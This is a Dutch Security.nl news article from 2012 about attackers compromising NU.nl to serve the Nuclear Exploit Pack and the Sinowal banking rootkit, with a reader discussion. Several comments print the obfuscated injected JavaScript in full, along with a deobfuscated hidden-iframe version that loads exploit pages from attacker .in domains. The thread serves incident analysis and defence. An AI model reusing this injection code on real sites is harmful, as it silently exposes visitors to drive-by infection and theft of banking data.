image

NU.nl besmet bezoekers met malware

woensdag 14 maart 2012, 13:53 door Redactie, 76 reacties

Aanvallers hebben een exploit op de populaire nieuwssite NU.nl verstopt en gebruikt om bezoekers met een gevaarlijk Trojaans paard te infecteren. De infectie was tegen gebruikers van verouderde software zoals Java, Flash Player en Adobe Reader gericht. De drive-by download zat waarschijnlijk verstopt in een advertentie, zegt Mark Loman van beveiligingsbedrijf SurfRight tegenover Security.nl. Loman ontdekte de exploit per toeval toen hij een demonstratie gaf. (In een update meldt SurfRight later dat de aanvaller het script op de webserver verstopt had en het niet om een kwaadaardige advertentie ging)

"Opeens werd er om Java gevraagd, maar ik heb helemaal geen Java geïnstalleerd." Vervolgens installeerde de onderzoeker Fiddler om het verkeer te analyseren. De exploit bleek vanaf een Indiase server te worden aangeboden, die vanwege alle drukte "werd gebombardeerd", merkt Loman op. Bij bedrijven zouden al tientalen infecties zijn waargenomen. SurfRight hoopt later met meer details over infecties bij consumenten te komen.

Java
De Java-exploit werd vervolgens gebruikt om een aangepaste versie van de Sinowal malware te installeren. Deze rootkit is ontwikkeld om bankrekeningen te legen en infecteert de Master Boot Record. Geen enkele van de 43 virusscanners op VirusTotal.com detecteerde de malware. Java is de afgelopen maanden massaal gebruikt om computers te infecteren.

Veel gebruikers vergeten de software, die vaak grote lekken bevat, te updaten, waardoor het bezoeken van een gehackte of kwaadaardige website volstaat. Om de aanvalscode toch op populaire websites te krijgen, gebruiken de aanvallers advertenties, ook wel malvertising genaamd. De malware zou inmiddels niet meer worden aangeboden.

Update 14:10
Zoals eerder vermeld zat de aanval niet in een advertentie verstopt maar had de aanvaller toegang tot de webserver. Daar plaatste hij een script dat de exploit van de Indiase server downloadde. De malware werd tussen 11:30 en 12:30 aangeboden. "Waarschijnlijk had lunchtijd er iets mee te maken", zegt Erik Loman tegen Security.nl.

Hij vermoedt dat het om een gerichte aanval gaat. In het uur werd de locatie van de server nog een keer aangepast, wat betekent dat de aanvaller nog toegang had. De reden hiervoor was dat de eerste server het verkeer niet aankon. De aangeboden exploits zijn onderdeel van het 'Nuclear Exploit Pack' die verschillende exploits gebruikt, waaronder Adobe Reader, Flash Player en Java.

Update 14:22
Een woordvoerster van Sanoma kon nog niet op de zaak reageren.

Update 16:10
NU.nl laat op de eigen website weten dat de inloggegevens van het Content Management Systeem (CMS) in verkeerde handen is geraakt. Toen de aanval bekend werd zou de nieuwssite alle accounts van beheerders en redactie hebben afgesloten en opnieuw uitgegeven. Tevens werden alle ‘logs’ veiliggesteld en worden die nu, net als alle content, op mogelijke kwaadaardige code onderzocht.

"De site wordt nu geheel opnieuw geïnstalleerd, wat naar verwachting rond 02.00 zal zijn afgerond. Zowel intern als extern worden extra veiligheidsscans uitgevoerd. We stellen bovendien een uitgebreid onderzoek in en daar waar mogelijk worden er verbeteringen aangebracht."

Reacties (76)
14-03-2012, 14:04 door [Account Verwijderd]
[Verwijderd]
14-03-2012, 14:30 door Anoniem
*Nuclear Exploit Pack
14-03-2012, 14:31 door Anoniem
Eigenlijk te triest voor woorden, geen woord hierover te vinden op NU.
Java wel geinstalleerd, maar FF plugins blokkeren de hele handel.
Betere methode is om helemaal geen browser te gebruiken.
14-03-2012, 14:49 door Anoniem
Is er een manier om te achterhalen of je bent geïnfecteerd ?
14-03-2012, 14:52 door Mozes.Kriebel
Geen enkele nieuwssite bericht hier over; men beschouwt dit kennelijk nog steeds als nerdnews.
14-03-2012, 14:54 door Anoniem
Gelukkig had Trend Micro hem in de pattern files zitten :)
14-03-2012, 14:55 door Anoniem
Ik had de eerste al om 11:18 in mijn logs staan.

eerste url was mops63jger . info
daarna is deze geswitch naar accent6 . in

Zie hier een analyse van de code van accent6:
http://wepawet.cs.ucsb.edu/view.php?hash=6a321fdb82898e94be3aa70584ae1f65&t=1331732265&type=js

Niet alleen een Java exploit dus. Ook PDF.
14-03-2012, 15:05 door Anoniem
voor welke besturingssystemen geldt dit?
14-03-2012, 15:06 door Anoniem
Inderdaad geen bericht op nu.nl. Waarschijnlijk is de zaak nog in onderzoek. Waarschijnlijk wel fijn om mensen straks te vertellen hoe de exploit te herkennen is en hoe deze vervolgens weer is te verwijderen.

Bijvoorbeeld: start cmd en type 'netstat -an' en kijk of poort xxxx wordt gebruikt.
14-03-2012, 15:21 door Anoniem
Je hoeft ook geen java te hebben geinstalleerd.... Javascript is iets totaal anders dan java en zit standaard in alle moderne browsers.
14-03-2012, 15:21 door Anoniem
Vreemd dat ik dit niet als eerste op nu.nl zelf lees... ze zitten bovenop het nieuws en hebben dan niet de primeur... vreemd hoor.
14-03-2012, 15:32 door Anoniem
Dit laatste nieuws staat helaas niet het eerst op nu.nl, het had ze goed gestaan als ze bezoekers daar wel meteen op zouden attenderen.
14-03-2012, 15:34 door Anoniem
Ik had er rond 11:40 ook last van: https://twitter.com/FraCaMen/status/179879603605745664

Ik heb direct daarop een mail naar de redactie gestuurd en gevraagd of ze er een technicus naar willen laten kijken.

Het lijkt erop dat bij mij Kaspersky wel zijn werkt goed heeft gedaan. Een full scan draait nog, maar nog geen rare dingen tegengekomen.
14-03-2012, 15:36 door Anoniem
Ik had gister deze melding:


TROJ_SINOWAL.SMF from E:\DOCUME~1\USER\LOCALS~1\Temp\35ED.tmp
at 3/13/2012 10:27:02

Ze zouden toch niet al langer besmet zijn he? Ik kon namelijk niet achterhalen waar deze melding vandaan kwam
14-03-2012, 15:37 door Anoniem
Gelukkig vraagt Comodo Dragon (Chromium based) netjes toestemming als hij iets met Java tegen komt...
Aan te bevelen browser!
14-03-2012, 15:47 door Anoniem
Kan iemand eens controleren of dit bij fok.nl ook is, want ik krijg daar nu ook de melding tegen. probeert te verbinden met perekladach.in
14-03-2012, 15:50 door Anoniem
ik merk net dat TrendMicro nu.nl blokkeert...
14-03-2012, 15:53 door Anoniem
Met noscript ingeschakeld in FF lijkt mij dit geen probleem ? :x
14-03-2012, 15:54 door Anoniem
Goedzo, allemaal snel op NU.nl kijken..
14-03-2012, 15:54 door Whacko
Had dit net al anoniem gepost:

Gisteren de volgende melding gekregen:


TROJ_SINOWAL.SMF from E:\DOCUME~1\USER\LOCALS~1\Temp\35ED.tmp
at 3/13/2012 10:27:02

Dus misschien waren ze gister al besmet.

Krijg nu in fiddler ook een melding te zien die probeert te verbinden naar
perekladach.in

wanneer ik naar fok.nl ga. Tegelijk verschijnt er dan een java icoontje in mijn taakbalk.

Dus misschien is dit groter dan alleen nu.nl
14-03-2012, 15:56 door Anoniem
Hoe kan ik nu zien of ik überhaupt besmet ben? Zijn Firefox gebruikers met Flash en ad block ook slachtoffer?
14-03-2012, 15:57 door Security Scene Team
Hahaha ik geloof dat ongeveer 80% van Security.nl bezoekers geinfecteerd is. Misschien een goeie les om NoScript te gebruiken? LOL
14-03-2012, 16:03 door Anoniem
Door Peter V: Net zoals deze veiligheidsondezoeker heb ik ook geen java geinstalleerd.

Een betere methode om malware (via java lekken) te weren is er niet.
Jawel. Niet meer internet opgaan.
14-03-2012, 16:04 door Anoniem
Heeft iemand een virustotal link voor deze malware?
14-03-2012, 16:06 door Anoniem
Door Security Scene Team: Hahaha ik geloof dat ongeveer 80% van Security.nl bezoekers geinfecteerd is. Misschien een goeie les om NoScript te gebruiken? LOL


Of een ander OS te gebruiken ?
14-03-2012, 16:19 door Anoniem
Door Anoniem:
Door Security Scene Team: Hahaha ik geloof dat ongeveer 80% van Security.nl bezoekers geinfecteerd is. Misschien een goeie les om NoScript te gebruiken? LOL


Of een ander OS te gebruiken ?

Worden jullie nou nooit zelf eens moe van dit geneuzel?
14-03-2012, 16:20 door Security Scene Team
Door Anoniem: Is er een manier om te achterhalen of je bent geïnfecteerd ?

probeer SDfix. anders raadt ik ten sterkste aan om Combofix te gebruiken. dit is een nasty rootkit.

Voor alle critici: als mensen hulp nodig hebben bij het gebruiken van combofix, laat het weten en ik zal een stappen plan posten.

Download SDfix: http://www.proposedsolution.com/downloads/download-sdfix-exe/
14-03-2012, 16:21 door Security Scene Team
Door Anoniem:
Door Security Scene Team: Hahaha ik geloof dat ongeveer 80% van Security.nl bezoekers geinfecteerd is. Misschien een goeie les om NoScript te gebruiken? LOL


Of een ander OS te gebruiken ?

Waarom zou je? als Noscript je goed beschermt. niet Java inschakelen als je het niet gebruikt. dat is vragen om problemen zoals dit exact. en trouwens dit nuclear exploit kit bevat "oudere" exploits. dus je bent GEK als je niet update, op zulke mensen wachten dit soort personen.

houd ALTIJD je softwares up-to-date, windows OS maar ook de bovenliggende softwares zoals Flash & Java.
hiervoor is VEEL gewaarschuwd o.a op security.nl

dusja als je geinfecteerd bent, heb je er zelf omgevraagt. misschien niet Bewust of direct gezegt, maar door niet te updaten. ik lees nu.nl ook dagelijks maar heb nergens last van qua infectie. achja je hebt werk paarden en van die sier paarden he ;)
14-03-2012, 16:25 door Sijmen Ruwhof
Door Anoniem: Heeft iemand een virustotal link voor deze malware?
Het schijnt om het bestand te gaan, dat stond op http://www.nu.nl/files/g.js. Als ik het bestand nu opvraag, dan krijg ik alleen 'OK' terug. Een kwartier geleden kreeg ik het volgende antwoord terug:

(function(){function dWiEHcv(){if(document.body){if(window.name!='vfMOlJM'&&!window.sWFxGyp){function snJPext(eBRREc){if(eBRREc.contentDocument)return eBRREc.contentDocument;if(eBRREc.contentWindow)return eBRREc.contentWindow.document;return eBRREc.document}var wCy3Tzm=window.navigator.userAgent.indexOf("Windows NT 6.")==-1;var fZMKvb={};with(fZMKvb){w26EFhdi=/a/.__proto__=='//';tviAzGT='\v'=='v'}var rktxOwE='zB1gYf79',fgCIisA0=wCy3Tzm?'6a321f65':'f14266b9',xEv8M5=wCy3Tzm?'zB1gYf79hzB1gYf79tzB1gYf79tzB1gYf79pzB1gYf79:zB1gYf79/zB1gYf79/zB1gYf79azB1gYf79czB1gYf79czB1gYf79ezB1gYf79nzB1gYf79tzB1gYf796zB1gYf79.zB1gYf79izB1gYf79nzB1gYf79/zB1gYf79izB1gYf79nzB1gYf79dzB1gYf79ezB1gYf79xzB1gYf79.zB1gYf79pzB1gYf79hzB1gYf79pzB1gYf79?zB1gYf790zB1gYf79azB1gYf79czB1gYf79bzB1gYf795zB1gYf79dzB1gYf79bzB1gYf79bzB1gYf793zB1gYf796zB1gYf79fzB1gYf799zB1gYf793zB1gYf791zB1gYf794zB1gYf791zB1gYf79bzB1gYf790zB1gYf792zB1gYf797zB1gYf79dzB1gYf794zB1gYf791zB1gYf796zB1gYf792zB1gYf796zB1gYf791zB1gYf79azB1gYf79fzB1gYf794zB1gYf792zB1gYf79ezB1gYf79':'zB1gYf79hzB1gYf79tzB1gYf79tzB1gYf79pzB1gYf79:zB1gYf79/zB1gYf79/zB1gYf79szB1gYf79vzB1gYf79izB1gYf79tzB1gYf79czB1gYf79hzB1gYf79uzB1gYf79dzB1gYf79ezB1gYf79szB1gYf79.zB1gYf79izB1gYf79nzB1gYf79/zB1gYf79izB1gYf79nzB1gYf79dzB1gYf79ezB1gYf79xzB1gYf79.zB1gYf79pzB1gYf79hzB1gYf79pzB1gYf79?zB1gYf799zB1gYf79azB1gYf794zB1gYf791zB1gYf79ezB1gYf792zB1gYf790zB1gYf79fzB1gYf795zB1gYf796zB1gYf794zB1gYf792zB1gYf794zB1gYf797zB1gYf796zB1gYf794zB1gYf798zB1gYf79azB1gYf79dzB1gYf79dzB1gYf794zB1gYf79ezB1gYf796zB1gYf79fzB1gYf791zB1gYf79ezB1gYf79czB1gYf791zB1gYf798zB1gYf79ezB1gYf796zB1gYf795zB1gYf79',zdhxK1aq='zB1gYf79izB1gYf79fzB1gYf79rzB1gYf79azB1gYf79mzB1gYf79ezB1gYf79',iOQQjI=fZMKvb.tviAzGT?'<'+zdhxK1aq.split(rktxOwE).join('')+' name="'+fgCIisA0+'" src="'+xEv8M5.split(rktxOwE).join('')+'">':zdhxK1aq.split(rktxOwE).join(''),gbByt2xI=document.createElement(iOQQjI);with(gbByt2xI){name=fgCIisA0;setAttribute('name',fgCIisA0);id=fgCIisA0}document.body.appendChild(gbByt2xI);if(window.name==='')window.name='vfMOlJM';window.sWFxGyp=true;with(gbByt2xI.style){if(!fZMKvb.w26EFhdi)position='absolute';left=top='0px';height=width='1px';visibility='hidden'}if(!fZMKvb.tviAzGT)snJPext(gbByt2xI).location.replace(xEv8M5.split(rktxOwE).join(''))}}else setTimeout(dWiEHcv,10)}dWiEHcv()})();
De VirusTotal rapportage over dit bestand is te vinden op https://www.virustotal.com/file/a558974f15b1ac9cc4d262c881c19d305435693d36d67bd10a2d421d76081dce/analysis/
14-03-2012, 16:26 door Anoniem
Een kanttekening:

Soms moet je wel java gebruiken. Voor school moet ik bijvoorbeeld voor zeer belangrijke documenten op "webct" inloggen. Webct vereist java. Dus zeggen dat je geen java moet installeren is kort door de bocht.
14-03-2012, 16:30 door Anoniem
http://www.nu.nl/internet/2763447/korte-tijd-malware-verspreid-via-nunl.html
http://nuweblog.wordpress.com/2012/03/14/nu-nl-weer-veilig-na-virus/

voor al de mensen die roepen "schande dat nu.nl er geen nieuws bericht over heeft"
14-03-2012, 16:30 door Anoniem
Nujij.nl valt dat er ook onder? Ben ik op dat tijdstip 5 minuutjes geweest... (En ja ik run een scan, maar ik vraag het toch even).
14-03-2012, 16:32 door Security Scene Team
Door Anoniem:
Door Peter V: Net zoals deze veiligheidsondezoeker heb ik ook geen java geinstalleerd.

Een betere methode om malware (via java lekken) te weren is er niet.
Jawel. Niet meer internet opgaan.

en Noscript gebruiken, en Upt-to-date blijven.. --beetje oplettende gezonde verstand kan ook geen kwaad! als je dit allemaal niet hebt en vooral het laatst genoemde: verkoop dan je PC en kom er NOOIT meer bij in de buurt, want je bent een gevaar voor je zelf als je je zelf al niet eens vertrouwd met java geinstalleert.

je bent nog steeds GEEN security expert als je Java niet hebt geinstalleert hoor!! dus na-apen maakt je geen Security expert ook nog niet iemand met gezond verstand.

het zegt alleen dat je je zelf niet vertrouwd met java erop.
14-03-2012, 16:37 door Anoniem
Voor degenen die meer informatie willen over de malware/Trojan:
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Win32%2fSinowal
http://www.security.nl/tag/sinowal
http://en.wikipedia.org/wiki/Torpig
14-03-2012, 16:37 door Anoniem
Vanuit de documents & settings - de temp map worden exe bestanden gestart.
Deze zijn waarschijnlijk random exe bestanden wat gegenereerd worden. Ik zou deze in ieder geval verwijderen/blokkeren :

24kkk729347.exe
0.7663469797755251.exe
0.6036367872288474.exe
0.402258122629215.exe
0.013310488956432276.exe
0.813612518032148.exe

Groet,
14-03-2012, 16:41 door Bitwiper
Door Sijmen Ruwhof op 2012-03-14 om 16:25: Het schijnt om het bestand te gaan, dat stond op http://www.nu.nl/files/g.js. Als ik het bestand nu opvraag, dan krijg ik alleen 'OK' terug. Een kwartier geleden kreeg ik het volgende antwoord terug:
(function()[knip]
Ik heb net voor 15:00 http://www.nu.nl/files/g.js gecheckt en kreeg toen "OK". Als jij daarna nog weer malware hebt gezien betekent dit dat nu.nl de zaak niet onder controle heeft en uiterst onverantwoordelijk bezig is door "open te blijven".
14-03-2012, 16:59 door Anoniem
Door Sijmen Ruwhof: De VirusTotal rapportage over dit bestand is te vinden op https://www.virustotal.com/file/a558974f15b1ac9cc4d262c881c19d305435693d36d67bd10a2d421d76081dce/analysis/
Dat op virustotal het javascript bestand niet als kwaadaardig wordt herkent vind ik niet zo raar. Hopelijk wordt de malware zelf (de executables dus) wel door de AV software herkend. Heeft iemand daar een virustotallink van?
14-03-2012, 17:22 door Anoniem
Door Anoniem: Nujij.nl valt dat er ook onder? Ben ik op dat tijdstip 5 minuutjes geweest... (En ja ik run een scan, maar ik vraag het toch even).

Nujij draait op een ander systeem, staat in zijn geheel los van nu.nl.

Heb net nog een scan gedaan met de gratis virusscanner van Microsoft en alles is nog clean.
14-03-2012, 17:25 door Sijmen Ruwhof
Na analyse van de bovenstaande JavaScript code komt de injectie neer op het volgende:

if (window.navigator.userAgent.indexOf("Windows NT 6.") == -1)
document.write('<iframe name="6a321f65" id="6a321f65" source="http://accent6.in/index.php?0acb5dbb36f93141b027d416261af42e" style="position: absolute; left: 0px; top: 0px; height: 1px; width: 1px display: none;">');
else
document.write('<iframe name="f14266b9" id="f14266b9" source="http://svitchudes.in/index.php?9a41e20f564247648add4e6f1ec18e65" style="position: absolute; left: 0px; top: 0px; height: 1px; width: 1px display: none;">');
14-03-2012, 17:29 door Anoniem
Door Bitwiper:
Door Sijmen Ruwhof op 2012-03-14 om 16:25: Het schijnt om het bestand te gaan, dat stond op http://www.nu.nl/files/g.js. Als ik het bestand nu opvraag, dan krijg ik alleen 'OK' terug. Een kwartier geleden kreeg ik het volgende antwoord terug:
(function()[knip]
Ik heb net voor 15:00 http://www.nu.nl/files/g.js gecheckt en kreeg toen "OK". Als jij daarna nog weer malware hebt gezien betekent dit dat nu.nl de zaak niet onder controle heeft en uiterst onverantwoordelijk bezig is door "open te blijven".

Grote kans dat de aanvraag van Sijmen een versie uit de cache betreft. Bij mij precies hetzelfde: vroeg hem zojuist op en kreeg de malware code. Daarna een F5 en de kreeg OK terug..
14-03-2012, 17:30 door Anoniem
Uit de thread op nujij.nl erover (nu.nl zet het bericht trouwens onder Tech, en dan nog een kleine kop ook nog) blijkt dat het virus eerst binnenkomt via Jpigframe.A, welke dan (vermoedelijk) verbinding maakt met de infectie-server en W32/Sinowal uitvoert.
14-03-2012, 17:35 door Anoniem
Door Sijmen Ruwhof: Na analyse van de bovenstaande JavaScript code komt de injectie neer op het volgende:

if (window.navigator.userAgent.indexOf("Windows NT 6.") == -1)
document.write('<iframe name="6a321f65" id="6a321f65" source="http://accent6.in/index.php?0acb5dbb36f93141b027d416261af42e" style="position: absolute; left: 0px; top: 0px; height: 1px; width: 1px display: none;">');
else
document.write('<iframe name="f14266b9" id="f14266b9" source="http://svitchudes.in/index.php?9a41e20f564247648add4e6f1ec18e65" style="position: absolute; left: 0px; top: 0px; height: 1px; width: 1px display: none;">');
Whith what tool did you make this analyse?
14-03-2012, 17:43 door Korakies
Ter voorkoming van besmetting door drive-by downloads heb ik de browser altijd draaien in de sandbox.

Daarnaast de volgende aanpassingen aangebracht op de Win 7 machine;
1) geen Java geinstalleed,
2) Hosts file aangepast om kwaadaardige reclame links te bannen,
3) AdblockPlus in de browser,
4) Threatfire voor de zero day exploits,

Noem mij misschien maar paranoïde, maar van dit soort berichten krijg ik dus de kriebels. Los van het vele werk om de PC weer op orde te krijgen, is het vooral het gevoel 'vertrouw ik mijn OS wel weer'.

Mocht ik nog iets hebben gemist dan hoor ik dit graag. Wellicht dat anderen iets hebben aan deze informatie.
14-03-2012, 17:45 door Anoniem
Helaas begrijp ik er niks van, wel kreeg ik vandaag een melding dat mijn virusvanger uitstond, nou dat had ik niet gedaan, ik heb het snel weer aangezet, heeft dat ook met dit te maken? Hoe kan ik zien of ik besmet ben en waarom waarschuwt niet, als er wel iets loos is, raken veel mensen besmet.

Zilvertje.
14-03-2012, 17:48 door [Account Verwijderd]
[Verwijderd]
14-03-2012, 18:03 door peanuty
Door Anoniem:

Het lijkt erop dat bij mij Kaspersky wel zijn werkt goed heeft gedaan. Een full scan draait nog, maar nog geen rare dingen tegengekomen.

. Geen enkele van de 43 virusscanners op VirusTotal.com detecteerde de malware. Java is de afgelopen maanden massaal gebruikt om computers te infecteren.
[/quote]
14-03-2012, 18:11 door Anoniem
FULL met FUD de reacties :)
Ten eerste richte de malware zich enkel op users met een Internet Explorer User Agent, dus veel van die add-ons gaan niet helpen. Als jullie eens breder kijken naar de scope van de aanval kan je constateren dat:

- één van de populairste sites in Nederland geowned is.
- Rond Lunch tijd men de malware serveerde (mensen kijken dan vaak op nu.nl)
- Bedrijven vaak alleen internet explorer hebben (en outdated java of outdated adobe)
- De aanvaller was actief bezig (dus geen virus wat ftp passwords steelt en pagina's aanpast)

Daarmee kan je constateren dat de impact vrij groot kan zijn.

Security Scene Team praat maar poep, hij kan beter eerst analyseren wat er daadwerkelijk gebeurd is, ipv ongefundeerd schreeuwen. Maar misschien kan die beter eerst een nieuwe nick bedenken
14-03-2012, 18:17 door Anoniem
Door Security Scene Team:
Door Anoniem:
Door Peter V: Net zoals deze veiligheidsondezoeker heb ik ook geen java geinstalleerd.

Een betere methode om malware (via java lekken) te weren is er niet.
Jawel. Niet meer internet opgaan.

en Noscript gebruiken

Veel mensen excluden bekende sites als nu.nl omdat de rommel "altijd van de advertenties komen". Dan helpt no-script dus niet.

Ik heb zelf in mijn whitelist gekeken en daar staat nu.nl niet in. Toevallig net vandaag ook niet op de gebruikelijke tijd wezen kijken op nu.nl.

Peter
14-03-2012, 18:20 door Anoniem
Door Anoniem: http://www.nu.nl/internet/2763447/korte-tijd-malware-verspreid-via-nunl.html
http://nuweblog.wordpress.com/2012/03/14/nu-nl-weer-veilig-na-virus/

voor al de mensen die roepen "schande dat nu.nl er geen nieuws bericht over heeft"

Dat nieuws stond er pas om 16:18 oid, dat is schandalig laat!
14-03-2012, 18:22 door Anoniem
Door Peter V:
Door Anoniem: Eigenlijk te triest voor woorden, geen woord hierover te vinden op NU.
Dat is niet waar. NU heeft het wel degelijk op de site gepubliceerd hoor.

Link:
http://www.nu.nl/internet/2763447/korte-tijd-malware-verspreid-via-nunl.html

Ja om 16:18 pas, hier begon het nieuws rond 14:00 te stromen!
14-03-2012, 18:24 door Bitwiper
Door Sijmen Ruwhof: Na analyse van de bovenstaande JavaScript code komt de injectie neer op het volgende:
[knip]
Thanks!
Google naar 0acb5dbb36f93141b027d416261af42e leverde op: http://achelois.tweakers.net/~crisp/nu.html (de daar ongetwijfeld naar verwijzende thread op Tweakers kan ik zo snel niet vinden, sorry crisp, dank voor het posten!)

In die sourcecode zie ik een check die je wat leesbaarder als volgt kunt uitschrijven:
if (notVista) {
evilUrl = "http://accent6.in/index.php?0acb5dbb36f93141b027d416261af42e";
}
else {
evilUrl = "http://svitchudes.in/index.php?9a41e20f564247648add4e6f1ec18e65";
}
De keuze voor de server lijkt dus af te hangen van het OS van de client.

Aanvulling: sorry Sijmen, ik kijk met m'n neus! In jouw analyse staat duidelijk "if (window.navigator.userAgent.indexOf("Windows NT 6.") == -1)" en dat is door crisp vertaald naar "notVista". Anyway, ik was weer eens te snel, maar misschien is het wel wat duidelijker zo....

Aanvulling 2: het is de vraag of NoScript je had gered als je Javascript voor nu.nl hebt toegestaan. Immers dan zal http://www.nu.nl/files/g.js gewoon worden uitgevoerd. Alleen als het iframe uit India dat geïnjecteerd wordt zelf ook van javascript gebruik maakt zal NoScript dat blokkeren. Of dat zo is heb ik nog niet kunnen onderzoeken. Wat meestal wel helpt is ervoor zorgen dat Java, Acrobat Reader, Flash, Quicktime en dergelijke up-to-date zijn; dit soort aanvallen maakt zelden gebruik van 0day exploits. Maar dit zou natuurlijk een uitzondering op de regel kunnen zijn....
14-03-2012, 18:28 door Anoniem
Door Korakies: Ter voorkoming van besmetting door drive-by downloads heb ik de browser altijd draaien in de sandbox.

Daarnaast de volgende aanpassingen aangebracht op de Win 7 machine;
1) geen Java geinstalleed,


Javascript != Java
Wel handig om goed uit elkaar te houden. Zonder javascript werken veel websites niet. Java (als in JVM) heeft in dit geval niets met dit probleem van doen.
14-03-2012, 18:39 door Sijmen Ruwhof
Voor diegene die geïnteresseerd zijn in een uitgebreidere analyse: http://sijmen.ruwhof.net/weblog/166-nu-nl-gehackt-malware-analyse
14-03-2012, 18:49 door john west
Vanochtend om 07:41 bij www.nu.nl geweest, ik kon niets ontdekken met Malwarebytes Anti-Malware.
Ik heb Java al een paar weken terug er af gegooid.
ook geen exe files in temp.
Het lijkt wel oorlog op internet,ik durf bijna niet meer te internet bankieren.
Is dit nog maar het begin ?

SDfix Combofix Threatfire zijn niet te downloaden,ligt het soms aan mij.?
14-03-2012, 19:19 door Anoniem
Zucht!!
Ten tijde van de meldingen en berichten op andere bronnen dan NU was er op NU niets over te vinden.
Altijd verder kijken dan je neus lang is, en berichten goed interpreteren.
"Ik heb het nooit zo op 'wijsneuzen'.
Neuh... we gaan niet 'warflamen'.


Door Peter V:
Door Anoniem: Eigenlijk te triest voor woorden, geen woord hierover te vinden op NU.
Dat is niet waar. NU heeft het wel degelijk op de site gepubliceerd hoor.

Link:
http://www.nu.nl/internet/2763447/korte-tijd-malware-verspreid-via-nunl.html
14-03-2012, 20:17 door Anoniem
Een site als nu.nl, prima plek om slachtoffers te maken.
Toevallig vandaag niet aan toe gekomen, anders had de XP met FF of IE6 op kantoor het zeker begeven.
Maar goed, niet mijn machine, dan had het geen windoos geweest. ;)
14-03-2012, 20:26 door FSF-Moses
Ik was tussen de middag ook even op NU.nl maar heb geen gekke dingen gezien. Ook niet met een volledige scan met aVast. Zou Firefox 11 met ghostery, AdBlockPlus en aVast het dan toch hebben tegengehouden?
Ook in de diverse temp-dir was niets geks te vinden....
14-03-2012, 21:05 door Anoniem
Gebruik gewoon mobiel.nu.nl/pda
Ben je overal vanaf.
14-03-2012, 23:03 door Anoniem
Helaas is het niet altijd mogelijk met alle Java-patches mee te gaan omdat nieuwere versies van Java niet backward compatible zijn. Zelfs bij grote fabrikanten speelt dit probleem. Zo werkt Cisco's peperdure beheersproduct Cisco Works / LMS echt niet meer als je met Java up-to-date bent; je MOET het bij die verouderde Java houden, anders heb je echt het nakijken met je mooie dure software. En ze zijn niet de enige die onder dit probleem lijden. Dat is inherent aan het gebruik van Java.
15-03-2012, 01:03 door Sijmen Ruwhof
Ik heb een infectietest ontwikkeld, zodat je kan controleren of je door nu.nl een virus gekregen hebt.

Laat je computer nu testen door op het onderstaande adres te klikken:
http://sijmen.ruwhof.net/js/nu.nl-infectietest/
15-03-2012, 03:08 door Fojo
Rond 17.30 haalde mijn pc de updates voor Windows 7 binnen. Ik heb de test van Sijmen Ruwhof logischerwijs pas daarna kunnen laten uitvoeren. Gelukkig met goed resultaat. Maar had de test ook vóór het binnenhalen van de updates hetzelfde resultaat gegeven?
15-03-2012, 06:27 door Above
Misschien handig om te weten dat je voor Chrome een ScriptNo v1.0.6.2 extensie hebt om dit te voorkomen. Hier kun je zelfs mee spoofen dat je een andere browser en OS hebt. Zeer handig.
15-03-2012, 08:05 door Anoniem
Wat ik mij echt afvraag, is hoe de login gegevens van het CMS bij een kwaadwillende partij terecht gekomen zijn.
15-03-2012, 08:59 door Mysterio
Door Sijmen Ruwhof: Ik heb een infectietest ontwikkeld, zodat je kan controleren of je door nu.nl een virus gekregen hebt.

Laat je computer nu testen door op het onderstaande adres te klikken:
http://sijmen.ruwhof.net/js/nu.nl-infectietest/
Lollig... maar omdat ik geen Acrobat Reader op mijn PC heb staan zou ik besmet kunnen zijn? ;)
15-03-2012, 09:14 door Rasalom
Door Anoniem: Je hoeft ook geen java te hebben geinstalleerd.... Javascript is iets totaal anders dan java en zit standaard in alle moderne browsers.
Dat klopt, maar Java is in deze context wel belangrijk.

Het script zocht naar exploiteerbare gaten in diverse plugins. Waaronder ook Java. Dus het uitschakelen van Java in je browser had in dit geval zeker zin.

Verder zocht het ook naar gaten in de PDF viewer en Flash.

De les die je hieruit kan trekken is dat je het beste zo min mogelijk plugins kan gebruiken.

Wat ik me nog wel afvraag, is of blockers als Flashblock het *automatisch* uitbuiten van gaten in Flash 100% voorkomen.
15-03-2012, 09:19 door Rasalom
Door Anoniem: Worden jullie nou nooit zelf eens moe van dit geneuzel?
Hoewel ik het 100% met je eens ben, was het in dit specifieke geval wel een oplossing geweest. Dit was een aanval op Windows machines. Een Mac of Linuxdoos had hier geen last van gehad.

Veranderen van OS puur om malware buiten de deur te houden is verder onzinnig omdat ook op die machines zero-day exploits voor kunnen (en zullen) komen.
15-03-2012, 09:23 door Anoniem
Je moet ook niet met je browser in je hoofd os browsen maar gewoo een vm ware image of oracle virtual box starten met daarin een os en je browser. Dan neem je een snapshot en zet je de schone snapshot steeds terug.


Niet met je hoofd os en browser het internet op. dat is het stomste wat je kunt doen.
15-03-2012, 09:24 door Anoniem
En nog wat anders. Het is verdomme al de 3e keer dat het gebeurt op die nu.nl de laatste keer had ik het gemeld.
15-03-2012, 09:39 door Anoniem
Als het een rootkit is dan ga je hem niet vinden met je scannertje jongens.

Want een rootkit vangt minstens alle os requests af.
15-03-2012, 11:00 door [Account Verwijderd]
[Verwijderd]
15-03-2012, 11:14 door [Account Verwijderd]
[Verwijderd]
15-03-2012, 11:38 door Anoniem
Zucht bij de gemeente amsterdam zijn ze helemaal hysterisch geworden.
Ze zijn er hier heilig van overtuigd dat alle wachtwoorden van ALLES veranderd moeten worden, zelfs ssh logins :S
15-03-2012, 16:36 door Anoniem
Door Anoniem:
Door Anoniem:
Door Security Scene Team: Hahaha ik geloof dat ongeveer 80% van Security.nl bezoekers geinfecteerd is. Misschien een goeie les om NoScript te gebruiken? LOL


Of een ander OS te gebruiken ?

Worden jullie nou nooit zelf eens moe van dit geneuzel?

Agreed met al die fanboys.
Ieder OS zn voor en nadelen.

Iemand enig idee of fok.nl ook slachtoffer is zoals boven de suggestie werd gewekt?
16-03-2012, 08:38 door Anoniem
Veel grappenmakers hier...!!!
16-03-2012, 18:19 door Anoniem
Ik heb het volgende overzicht:
14-3-2012 11:18:20 - disp=Allow, src_ip=x.x.x.135, dst_ip=66.199.232.98, dst_port=80, rcvd_bytes=246, sent_bytes=634, op=GET, dstname=mops63jger . info, arg=/i.php
14-3-2012 11:18:21 - disp=Allow, src_ip=x.x.x.135, dst_ip=66.199.232.98, dst_port=80, rcvd_bytes=23648, sent_bytes=633, op=GET, dstname=mops63jger . info, arg=/1O9K
